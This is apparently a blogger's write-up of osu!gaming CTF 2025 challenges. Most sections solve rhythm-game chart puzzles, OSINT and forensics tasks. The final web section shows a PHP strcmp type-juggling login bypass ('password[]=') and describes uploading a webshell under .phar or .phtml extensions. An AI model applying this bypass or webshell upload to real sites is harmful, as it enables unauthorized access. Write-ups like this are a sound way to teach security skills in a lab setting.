osu!gaming CTF 2025 Writeup
Introduction
Long time no write! This time I participated in osuCTF with team moe 137. Had fun playing in this CTF, challenges were quality and extra fun if you're a rhythm gamer nerd. Here's a few selected writeups from the challenges I participated in solving. Thanks to my team for playing with me and thanks to the challenge creators!
rhythm/ksh
We're given a K-Shoot MANIA (sdvx clone) chart for the song Harumachi Clover, but with no audio files or anything else. A search finds us a chart uploaded for the song with half the flag in the description.
After importing the file into KSM, we can see the other half.
rhythm/lunatic-ksm
In this challenge, a KSH file for the song JIR is given, but only for one difficulty. I had trouble opening the chart inside the game directly, so after that I found the original chart online and compared the two to see if they were really different - and they were!
After some searching, I found that I could view the chart here.
If you read closely, at line 171 begins to read: osu{KONASUTE_IS_A_SCAM}. A bit hard to read, but you can kinda just infer because IS A SCAM is easy to read and KONASUTE is a sdvx thing.
rhythm/hidden-signal
We're given a file with MaiMai data for the song QZKAGO REQUIEM. We can take a look at this with MajdataEdit.
If you compare this section with charts online for this particular difficulty, you will find that this section is unique to this challenge's map:
My first thought was that it was supposed to spell out something visually, but after some back and forth, in a last ditch effort I just transcribed the highs and lows into 1s and 0s into Cyberchef - and then... ?
No way. That was it! I had to play a bit to get a clear word after that. An 0 is missing in the string, but when added you'll find that the flag is: osu{MAIMAICIRCLE}
osint/dmca
We need to find the email address of somebody who DMCA'd osu and misspelled it. You can find a lot of DMCAs on a gist account, but I actually just found the actual one you need to find randomly on twitter.
forensics/map-dealer
We have an .E01 file that I'll just open up in FTK imager.
Inside, you'll find a beatmap with a fake flag inside. To find the real flag, open the map in osu!.
web/admin-panel
We have an admin panel that we're able to login to, but we don't have any credentials.
Looking at the source code, we find this:
if ($username == "peppy" && strcmp($admin_password, $password) == 0 {
$_SESSION["logged_in] = true;
header("Location: admin.php");
exit();
}
}
There's a lot documented about bypassing strcmp with type juggling. We can do this by sending a request with the password as an array.
username=peppy&password[]=''
After doing this, we see that the admin is able to upload something to the site. In the source code, we notice 2 checks:
One check to see if the file ends with .php, and one to see if the file contains a php snippet. It's pretty easy to bypass with files such as .phar, .phtml and by using alternative webshells. This is the payload I went with.
Then, navigate to uploads and get the flag.
